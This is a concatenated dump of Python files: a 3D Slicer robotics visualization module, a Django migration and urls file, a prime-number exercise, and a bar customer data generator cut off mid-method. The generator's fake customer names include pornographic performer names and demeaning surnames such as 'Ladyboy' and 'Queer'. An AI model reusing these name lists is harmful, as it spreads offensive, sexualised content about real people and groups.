round((scalarRange[1] - self.colorbarValue) / (self.colorbarValue - scalarRange[0]) * 256 + 256))
densityColor = slicer.mrmlScene.AddNode(slicer.modules.colors.logic().CopyNode(
slicer.mrmlScene.GetNodeByID("vtkMRMLColorTableNodeFileColdToHotRainbow.txt"), "densityColor"))
densityColor.SetNumberOfColors(int(newColorSize))
offset = 10
for i in range(256, newColorSize - offset):
densityColor.SetColor(i, 0.453125, 0, 0)
for i in range(newColorSize - offset, newColorSize - 1):
densityColor.SetColor(i, 0.875, 0.671875, 0.41015625)
if couldConnectToMoveIt and foundInfeasiblePosition:
densityColor.SetColor(newColorSize - 1, 0.35, 0.35, 0.35)
else:
densityColor.SetColor(newColorSize - 1, 0.875, 0.671875, 0.41015625)
modelDisplayNode.SetAndObserveColorNodeID(densityColor.GetID())
print("Displaying...")
modelDisplayNode.SetScalarVisibility(True)
modelDisplayNode.SetScalarRangeFlag(0)
modelDisplayNode.SetScalarRange((scalarRange[0], scalarRange[1]))
def addOverlay(self, outputModel, targetNode):
targetNode.GetMarkupPoint(0, 0, self.targetGlobal)
self.targetPoint = self.transformToCT(self.targetGlobal)
logging.info("Surface point in CT indices: {}".format(self.targetPoint))
npArrPoly = arrayFromModelPoints(outputModel)
if self.waypoint(25, "Adding scalar overlay"):
return None
self.scalarData = vtk.vtkFloatArray()
self.scalarData.SetNumberOfComponents(0)
self.scalarData.SetNumberOfValues(len(npArrPoly))
self.scalarData.SetName("density")
# Calc density for all relevant surface points
point_VolumeRas = vtk.vtkPoints()
transformed = self.transformPointsToCT(outputModel.GetPolyData().GetPoints(), point_VolumeRas)
distances = np.linalg.norm(npArrPoly - self.targetGlobal, axis=1)
pointOutside = np.add(np.add(distances > self.maxDistance, ~self.pointInVolume(transformed, self.arrShape)),
npArrPoly[:, 1] < 50 + np.min(npArrPoly[:, 1]))
pointInside = ~pointOutside
np.asarray(self.scalarData)[pointOutside] = self.globalMaxDensity
indices = list(compress(range(len(pointInside)), pointInside))
insideTransformed = np.asarray(list(compress(transformed, pointInside)))
self.maxIdx = len(indices) - 1
logging.info(self.maxIdx)
with np.errstate(divide='ignore', invalid='ignore'):
if self.overlayTypeIndex == 7:
start_B = time.time()
self.overlayTypeIndex = 0
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(40):
return None
combinedData = np.copy(self.scalarData)
relevant_indices = np.logical_and(combinedData < self.colorbarValue, pointInside)
end_B = time.time()
self.T1 = end_B - start_B
if self.distanceWeighting > 0:
self.overlayTypeIndex = 4 # Distance
start_C = time.time()
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(60):
return None
maxDistance = self.maxDistance
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxDistance * self.colorbarValue
combinedData[relevant_indices] = self.distanceWeighting * np.asarray(self.scalarData)[
relevant_indices]
end_C = time.time()
self.T2 = end_C - start_C
else:
combinedData[relevant_indices] = 0
if self.angleWeighting > 0:
start_D = time.time()
self.overlayTypeIndex = 5 # Angle
if not calcDensityInThread(self, indices, insideTransformed):
return None
maxAngle = np.pi / 2
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxAngle * self.colorbarValue
combinedData[relevant_indices] = combinedData[relevant_indices] + self.angleWeighting * \
np.asarray(self.scalarData)[relevant_indices]
end_D = time.time()
self.T3 = end_D - start_D
np.asarray(self.scalarData)[:] = combinedData
self.overlayTypeIndex = 7
else:
if not calcDensityInThread(self, indices, insideTransformed):
return None
return indices, insideTransformed
def initWithPreviousModel(self, inputVolume, outputModel):
if self.arrShape is None:
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
self.spacing = inputVolume.GetSpacing()
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
outputModel.GetPolyData().GetPointData().RemoveArray("density")
def segmentSkin(self, inputVolume, outputModel):
# If volume node is transformed, apply that transform to get volume's RAS coordinates
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.spacing = inputVolume.GetSpacing()
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
if self.waypoint(5, "Creating segmentation"):
return False
# Create segmentation
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
addedSegmentID, segmentEditorWidget, segmentEditorNode = self.initSegmentationNode(inputVolume)
self.applyThresholding(segmentEditorWidget, inputVolume)
if self.waypoint(10, "Selecting largest island"):
return False
self.applyLargestIsland(segmentEditorWidget)
if self.useHoleFilling:
if self.waypoint(12, "Filling holes"):
return False
self.applySmoothing(segmentEditorWidget)
if self.waypoint(18, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
if self.waypoint(19, "Selecting largest island"):
return False
# Selecting largest island
self.applyLargestIsland(segmentEditorWidget)
if self.waypoint(20, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
# Cleanup
segmentEditorWidget.setActiveEffectByName(None)
slicer.mrmlScene.RemoveNode(segmentEditorNode)
if self.waypoint(21, "Creating closed surface"):
return False
outputPolyData = vtk.vtkPolyData()
slicer.vtkSlicerSegmentationsModuleLogic.GetSegmentClosedSurfaceRepresentation(self.segmentationNode,
addedSegmentID, outputPolyData)
outputModel.SetAndObservePolyData(outputPolyData)
self.segmentationNode.GetDisplayNode().SetVisibility(False)
def checkMoveIt(self, modelPoints):
# Split Array
positions = modelPoints[:, :3]
color = modelPoints[:, 3]
# Only eval Points which have a feasible color
relevantColor = color < self.globalMaxDensity
positions_color = positions[relevantColor, :]
# Round Positions
positions_color_r = np.ceil(positions_color / self.discreetStepsValue) * self.discreetStepsValue
# Find unique Positions
positions_color_r_unique = np.unique(positions_color_r, axis=0)
transformedPoints = self.transformToBase(
np.append(np.expand_dims(self.targetGlobal, axis=0), positions_color_r_unique, axis=0))
sendArray = np.append(np.array([len(positions_color_r_unique)]), transformedPoints.flatten())
target_transformed = transformedPoints[0, :3]
self.waypoint(96, 'Starting Checking Points with MoveIt')
# print(sendArray)
print('Points to evaluate:' + str(len(positions_color_r_unique)))
# Convert to Float
moveIt_result = self.sendInPieces(positions_color_r_unique, sendArray, target_transformed)
# print("moveIt_result_boolean", moveIt_result)
moveIt_result_idx = np.ones(len(moveIt_result))
if np.any(np.asarray(moveIt_result)):
moveIt_result_idx[np.asarray(moveIt_result)] = 2
# 0 --> not in map, 1 --> in colormap but not reachable, 2 --> in colormap and reachable
self.waypoint(99, 'Finished Checking Points with MoveIt')
# Update Color List
color_array_moveIT = np.zeros(len(positions_color_r))
for count, p in enumerate(positions_color_r_unique):
color_array_moveIT[np.all(positions_color_r == p, axis=1)] = moveIt_result_idx[count]
modelPointsOut = np.zeros((len(positions), 5), dtype=float)
modelPointsOut[:, :3] = positions
modelPointsOut[:, 3] = color
modelPointsOut[relevantColor, 4] = color_array_moveIT
return modelPointsOut
def sendInPieces(self, positions_color_r_unique, sendArray, target_transformed):
sent = 0
socketsForSimulation = self.socketReceiveSend if len(self.socketReceiveSend) <= 1 else self.socketReceiveSend[1:]
per_package = int(np.ceil(len(positions_color_r_unique) / len(socketsForSimulation)))
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
to_send = np.append(np.asarray((up_idx - sent)), target_transformed[:3])
to_send = np.append(to_send, sendArray[(4 + sent * 3):(up_idx * 3 + 4)])
sent = up_idx
s.send(str(to_send.tolist()).encode())
# Receive Answer
moveIt_result = []
sent = 0
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
sent = up_idx
recv_data = s.recv(102400)
msg = list(recv_data.decode('utf-8'))
moveIt_result += [bool(int(i)) for i in msg]
return moveIt_result
def applyMaxKernel(self, indices, pointsTransformed):
if self.maxKernelSize == 0:
return True
self.waypoint(75., "Applying max kernel")
from sklearn.neighbors import radius_neighbors_graph
values = np.copy(self.scalarData)
values = values[indices]
neighbours = radius_neighbors_graph(pointsTransformed * self.spacing, radius=self.maxKernelSize, n_jobs=-1,
include_self=True)
executeInPieces(lambda q, idx, sent: self.applyMaxKernelImpl(q, idx, neighbours, values, sent), indices, np.asarray(self.scalarData))
if self.waypoint(95.):
return False
return True
@staticmethod
def applyMaxKernelImpl(q: Queue, indices, neighbours, values, idxOffset):
result = np.zeros((len(indices)))
for neighbourIdx, idx in enumerate(indices):
finalIdx = np.asarray(neighbours.getrow(neighbourIdx + idxOffset).toarray(), dtype=bool).flatten()
result[neighbourIdx] = np.max(values[finalIdx])
q.put(result)
def pointInVolume(self, point, maxDim):
return np.logical_and(np.all(point > 0, axis=1), np.all(point < maxDim - 1, axis=1))
def transformToCT(self, point):
point_VolumeRas = self.transformRasToVolumeRas.TransformPoint(point[0:3])
point_Ijk = self.volumeRasToIjk.TransformPoint(point_VolumeRas)
return np.asarray(np.flip(point_Ijk[0:3], 0), dtype=int)
def transformPointsToCT(self, points, point_VolumeRas):
tmp = vtk.vtkPoints()
self.transformRasToVolumeRas.TransformPoints(points, tmp)
self.volumeRasToIjk.TransformPoints(tmp, point_VolumeRas)
return np.asarray(np.flip(vtk.util.numpy_support.vtk_to_numpy(point_VolumeRas.GetData())[:, 0:3], 1),
dtype=int)
def applyGantryMesh(self, tf_matrix: np.ndarray):
IJK_T_RAS = np.eye(4)
transformed_pose = tf_matrix.dot(IJK_T_RAS).dot(self.gantry_pose)
size = 3000.
points = np.asarray(((0., 0., 0., 1.), (0., size, 0., 1.), (size, 0., 0., 1.), (size, 0., 0., 1.),
(0., size, 0., 1.), (size, size, 0., 1.))).T
points = transformed_pose.dot(points)[:3, :]
max_v = np.max(points, axis=1)
min_v = np.min(points, axis=1)
center = (max_v - min_v) / 2 + min_v
points = np.subtract(points.T, center)
sendArray = np.append(np.append(np.asarray((-2., 1.)), center), points.flatten())
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
def transformPoints(self, points, matrix):
transformed = matrix.dot(np.append(points, np.ones((np.shape(points)[0], 1)), axis=1).T)
return transformed[:3, :].T
def transformToBase(self, points):
tf_mat = self.np_matrix_from_vtk(self.matrix)
IJK_T_RAS = np.eye(4)
IJK_T_RAS[0, 0] = -1
IJK_T_RAS[1, 1] = -1
tf_mat = tf_mat.dot(IJK_T_RAS)
return self.transformPoints(points, tf_mat)
def applyCollisionMesh(self, points: np.ndarray):
resolution = 30.
# Round Positions
positions_to_eval_subsampled = np.round(points / resolution) * resolution
# Find unique Positions
unique_points_eval = np.unique(positions_to_eval_subsampled, axis=0)
if len(unique_points_eval) == 0:
return
points_arr = self.transformToBase(unique_points_eval)
cloud = pv.PolyData(points_arr[:, :3])
# cloud.plot()
volume = cloud.delaunay_3d(alpha=resolution * 1.2)
shell = volume.extract_geometry()
# shell.plot()
# Hull
# hull = ConvexHull(points_arr[:, :3])
indices = shell.faces.reshape((-1, 4))[:, 1:]
vertices = points_arr[indices]
# add table
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
table_slack = 30.
depth = 500.
min_v[2] += table_slack
min_v[:2] -= table_slack
max_v[:2] += table_slack
table = np.asarray(
(((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2] - depth), (min_v[0], max_v[1], min_v[2] - depth),
(max_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2] - depth), (max_v[0], max_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2] - depth), (min_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2])),
((max_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((max_v[0], max_v[1], min_v[2] - depth), (max_v[0], min_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth),
(min_v[0], max_v[1], min_v[2] - depth))))
vertices = np.append(table, vertices, axis=0)
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
center = (max_v - min_v) / 2 + min_v
vertices -= center
# Convert to Float
sendArray = np.append(np.append(np.asarray((-2., 0.)), center), np.ndarray.flatten(vertices))
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
@staticmethod
def isValidInputOutputData(inputVolumeNode, outputModel, targetNode):
"""Validates that the input volume, output model and target node are all set.
"""
if not inputVolumeNode:
logging.debug('isValidInputOutputData failed: no input volume node defined')
return False
if not outputModel:
logging.debug('isValidInputOutputData failed: no output model node defined')
return False
if not targetNode:
logging.debug('isValidInputOutputData failed: no target node defined')
return False
return True
def waypoint(self, percentageDone=None, log=None):
if log:
logging.info(log)
if self.updateCallback:
self.updateCallback(percentageDone)
if self.cancel:
self.cancel = False
return True
return False
def cleanUp(self):
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
def initSegmentationNode(self, inputVolume):
self.segmentationNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentationNode")
self.segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(inputVolume)
addedSegmentID = self.segmentationNode.GetSegmentation().AddEmptySegment("skin")
segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()
segmentEditorWidget.setMRMLScene(slicer.mrmlScene)
segmentEditorNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentEditorNode")
segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)
segmentEditorWidget.setSegmentationNode(self.segmentationNode)
segmentEditorWidget.setMasterVolumeNode(inputVolume)
return addedSegmentID, segmentEditorWidget, segmentEditorNode
def applyThresholding(self, segmentEditorWidget, inputVolume):
rangeHU = inputVolume.GetImageData().GetScalarRange()
# Thresholding
segmentEditorWidget.setActiveEffectByName("Threshold")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("MinimumThreshold", self.imageThreshold)
effect.setParameter("MaximumThreshold", rangeHU[1])
effect.self().onApply()
def applyLargestIsland(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Islands")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "KEEP_LARGEST_ISLAND")
effect.setParameter("MinimumSize", 1000)
effect.self().onApply()
def applySmoothing(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Smoothing")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("SmoothingMethod", "CLOSING")
effect.setParameter("KernelSizeMm", 10)
effect.self().onApply()
def applyInverting(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Logical operators")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "INVERT")
effect.self().onApply()
def calcDensityInThread(logic: BestPathVisualizationLogic, indices: list, insideTransformed: np.ndarray):
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
    original_stdin = sys.stdin
    sys.stdin = open(os.devnull)  # keep child processes from inheriting the embedded console's stdin
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=calcDensityImpl, args=(
q, logic.targetPoint, logic.arrShape, insideTransformed[sent:local_sent, :], indices[sent:local_sent],
logic.imageThreshold, logic.globalMaxDensity, logic.inputVolumeNPArray, logic.overlayTypeIndex,
logic.spacing))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
np.asarray(logic.scalarData)[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
return True
def calcDensityImpl(q: Queue, targetPoint: np.ndarray, arrShape: np.ndarray, insideTransformed: np.ndarray,
indices: list, imageThreshold: float,
globalMaxDensity: float, inputVolumeNPArray: np.ndarray, overlayTypeIndex: int,
spacing: np.ndarray):
densities = np.zeros((len(indices)))
for dispIdx in range(len(indices)):
densities[dispIdx] = overlay.calcDensity(targetPoint, arrShape, insideTransformed[dispIdx], indices[dispIdx],
imageThreshold, globalMaxDensity, inputVolumeNPArray, overlayTypeIndex,
spacing)
q.put(densities)
def executeInPieces(function, indices, outArray):
    """Split `indices` into one chunk per CPU core, run `function` on each
    chunk in its own subprocess, and gather each chunk's result into `outArray`."""
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
original_stdin = sys.stdin
sys.stdin = open(os.devnull)
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=function,
args=(q, indices[sent:local_sent], sent))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
outArray[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
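# The chunked Process/Queue fan-out in executeInPieces is generic: any worker
# that accepts (queue, index_slice, offset) can be parallelized with it. A
# minimal sketch of a compatible worker; squareWorker and its squaring
# workload are illustrative assumptions, not part of the original module.
def squareWorker(q: Queue, indices: list, offset: int):
    # One result per index in the chunk; a real worker computes densities etc.
    q.put(np.asarray(indices, dtype=float) ** 2)

if __name__ == '__main__':
    idx = list(range(1000))
    out = np.zeros(max(idx) + 1)  # executeInPieces writes results at out[indices]
    executeInPieces(squareWorker, idx, out)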
# [end of file; author: stefan.gerlach@tuhh.de]

# === FILE: /df_project_generate/__init__.py (repo: darfat/skp-jabar, no license) ===
##############################################################################
#
# Darmawan Fatriananda
# BKD Pemprov Jabar
# Copyright (c) 2014 <http://www.asdarfat.wordpress.com.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import wizard
# [end of file; author: darmawan.jtk04@gmail.com]

# === FILE: /week8/Simple Project/blog/migrations/0001_initial.py (repo: Orik236/Web_Orka236, no license) ===
# Generated by Django 2.2.11 on 2020-03-16 18:07
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
                # NOTE: a frozen timestamp was captured here because the model
                # passed default=timezone.now() (called) instead of the callable.
                ('created_date', models.DateTimeField(default=datetime.datetime(2020, 3, 16, 18, 7, 32, 353192, tzinfo=utc))),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
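# The frozen default above is the classic symptom of writing
# default=timezone.now() in the model, so makemigrations evaluates it once. A
# hedged sketch of the corrected field, assumed to live in blog/models.py
# (author FK omitted for brevity):
#
# from django.db import models
# from django.utils import timezone
#
# class Post(models.Model):
#     title = models.CharField(max_length=200)
#     text = models.TextField()
#     created_date = models.DateTimeField(default=timezone.now)  # callable, evaluated per row
#     published_date = models.DateTimeField(blank=True, null=True)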
# [end of file; author: orik236@gmail.com]

# === FILE: /coding_solutions/Day16(3-06-2020)/PrimeInterval.py (repo: alvas-education-foundation/Dhanya-bhat, no license) ===
l = int(input("Enter start point: "))
u = int(input("Enter end point: "))
for num in range(l, u + 1):
    if num > 1:
        for i in range(2, num):
            if (num % i) == 0:
                break
        else:
            # for/else: runs only when no divisor was found, so num is prime
            print(num)
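# A hedged, faster variant of the same interval check (Python 3.8+ for
# math.isqrt); trial division only needs to reach the square root:
import math

def primes_in_interval(lower, upper):
    """Same output as the loop above, but divisor checks stop at sqrt(num)."""
    for num in range(max(lower, 2), upper + 1):
        if all(num % i for i in range(2, math.isqrt(num) + 1)):
            print(num)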
# [end of file; author: dhanyabhat29@gmail.com]

# === FILE: /api/hypem/urls.py (repo: guess/hypem, no license) ===
# NOTE: patterns() and string view references are Django <= 1.9 idioms;
# patterns() was deprecated in 1.8 and removed in 1.10.
from django.conf.urls import patterns, include, url
from django.contrib import admin

urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^(\w+)/(\w+)/(\d+)', 'hypem.views.home', name='home'),
)
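# Hedged Django >= 2.0 equivalent; the views import path is assumed from the
# project layout and is not confirmed by the original file:
#
# from django.contrib import admin
# from django.urls import path, re_path
# from hypem import views
#
# urlpatterns = [
#     path('admin/', admin.site.urls),
#     re_path(r'^(\w+)/(\w+)/(\d+)', views.home, name='home'),
# ]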
# [end of file; author: stevetsourounis@gmail.com]

# === FILE: /dataGenerator/dataGenerator.py (repo: GwennaelBuchet/zenibar, MIT) ===
from datetime import datetime as _dt
from datetime import date as _date
from datetime import timedelta as _td
import math
import random
import json
class Beer:
def __init__(self, id, brand, model, strongness, style, color, origin, price):
self.id = id
self.brand = brand
self.model = model
self.strongness = strongness
self.style = style
self.color = color
self.origin = origin
self.rank = 0
self.price = price
self.stock = 0
def canMatch(self, conditions):
for condition in conditions:
if eval("self." + condition) == False:
return False
return True
    # _try needs self: class-body names are not visible inside methods, so the
    # original bare _try(o) call raised NameError when the default was invoked.
    def _try(self, o):
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Customer:
"""Un client et son historique"""
def __init__(self, id, firstname, lastname,
registrationDate, lastvisitDate,
averageUptakesPerDay, habits, ponderationDays, amount):
self.id = id
self.firstname = firstname
self.lastname = lastname
self.registrationYear = registrationDate.year
self.registrationMonth = registrationDate.month
self.registrationDay = registrationDate.day
self.registrationDate = registrationDate
self.lastvisitYear = lastvisitDate.year
self.lastvisitMonth = lastvisitDate.month
self.lastvisitDay = lastvisitDate.day
self.lastvisitDate = lastvisitDate
self.averageUptakesPerDay = averageUptakesPerDay
self.habits = habits
# beers that fit the habits/preferences of this customer
self.suitableBeers = []
self.uptakes = []
# ponderationDays correspond tho the percents of chance the customer will go to the bar for each day of the week
self.ponderationDays = ponderationDays
self.amount = amount
@staticmethod
def generateName(indice):
namesList = [["Adrien", "Legrand"], ["Gwennael", "Buchet"], ["Marcel", "Beliveau"], ["Sasha", "Foxxx"],
["Jenna", "Haze"], ["Riley", "Reid"], ["Kobe", "Tai"], ["Daisie", "Marie"], ["Lisa", "Ann"],
["Tori", "Black"], ["Jannice", "Griffith"], ["Emilie", "Grey"], ["Mia", "Khalifa"],
["Cassidy", "Banks"], ["Régine", "Zylberberg"], ["Nikita", "Bellucci"]]
firstnames = ["Amber", "Andy", "Natasha", "Sandy", "Aurora", "Susie", "Cathy", "Clara", "Coralie", "Erika",
"Estelle", "Jenna", "Kelly", "Teri", "Shannon", "Jasmin", "Stormy", "Dolly", "Gina", "Heather",
"Julia", "Marilyn", "Olivia", "Vanessa", "Nikita", "Brigitte"]
lastnames = ["Labouche", "Storm", "Doll", "Lynn", "Vega", "Lord", "Kitty", "Angel", "Amor", "Dee", "Pecheresse",
"King", "Young", "Love", "Star", "Tits", "Moon", "Tekila", "Coco", "Shave", "Canelle", "Chocolat",
"Barbie", "Ladyboy", "Queer", "Dior", "Stone", "Kass", "Pink"]
if indice < len(namesList):
return namesList[indice]
firstname = firstnames[math.ceil(random.random() * len(firstnames)) - 1]
lastname = lastnames[(indice - len(namesList) - 1) % len(lastnames)]
return [firstname, lastname]
@staticmethod
def generateFirstDate():
delta = _td(math.ceil(random.random() * 60))
return OPENING_DATE + delta
@staticmethod
def generateLastDate():
delta = _td(math.ceil(random.random() * 30))
return LAST_DATE - delta
@staticmethod
def generateAverageUptakes():
return 1 + math.ceil(random.random() * 5)
@staticmethod
def generatePonderations():
ponderations = []
ponderations.append(random.random() / 5) # monday
ponderations.append(0.2 + random.random() / 3.5) # tuesday
ponderations.append(0.2 + random.random() / 3) # wednesday
ponderations.append(0.3 + random.random() / 2) # thursday
ponderations.append(0.35 + random.random() / 2) # friday
ponderations.append(0.66 + random.random() / 3) # saturday
ponderations.append(0) # sunday. Bar is closed
return ponderations
@staticmethod
def generateHabits():
habits = []
# strongness
strongness = round(4 + random.random() * 5, 1)
strongnessSign = "<" if math.copysign(1, -1 + random.random() * 2) < 0 else ">"
if strongness <= 6:
strongnessSign = ">"
if strongness >= 9:
strongnessSign = "<"
habits.append("strongness" + strongnessSign + str(strongness))
# style
allStyles = ["'IPA'", "'Amber'", "'Belgian Pale Ale'", "'Belgian Dark Ale'", "'Lager'", "'Abbaye'", "'White'",
"'Alcool Free'", "'Extra Special Bitter'"]
selectedStyles = []
for s in allStyles:
if random.random() < 0.5:
selectedStyles.append(s)
style = "style in [" + ", ".join(selectedStyles)
style += "]"
habits.append(style)
# color
allColors = ["'White'", "'Blond'", "'Amber'", "'Brown'", "'Black'"]
selectedColors = []
for i, c in enumerate(allColors):
if random.random() < 0.5:
selectedColors.append(c)
color = "color in [" + ", ".join(selectedColors)
color += "]"
habits.append(color)
return habits
@staticmethod
def generateAmount():
return math.ceil(36 + random.random() * 40)
    def _try(self, o):  # scoping fix, as in Beer
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Uptake:
def __init__(self, customerId, beersId):
self.customerId = customerId
self.beersId = beersId
    def _try(self, o):  # scoping fix, as in Beer
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class DailyUptakes:
"""History of uptakes for 1 day"""
def __init__(self, weather, singleDateTime):
self.weather = weather
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.uptakes = []
    def _try(self, o):  # scoping fix, as in Beer
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class CustomerDailyUptakes:
"""Une consommation par le client"""
def __init__(self, singleDateTime, beersId):
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.beersId = beersId
    def _try(self, o):  # scoping fix, as in Beer
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
class Bar:
def __init__(self, beers, customers):
self.dailyUptakes = []
self.beers = beers
self.customers = []
self.nbTotalUptakes = 0
for customer in customers:
self.addCustomer(customer)
def addCustomer(self, customer):
self.addSuitableBeersToCustomer(customer)
while len(customer.suitableBeers) == 0:
customer.habits = Customer.generateHabits()
self.addSuitableBeersToCustomer(customer)
self.customers.append(customer)
def addBeer(self, beer):
self.addSuitableBeerToCustomers(beer)
self.beers.append(beer)
def addSuitableBeersToCustomer(self, customer):
""" Try to find beers in this bar which can fit customer's habits """
for beer in self.beers:
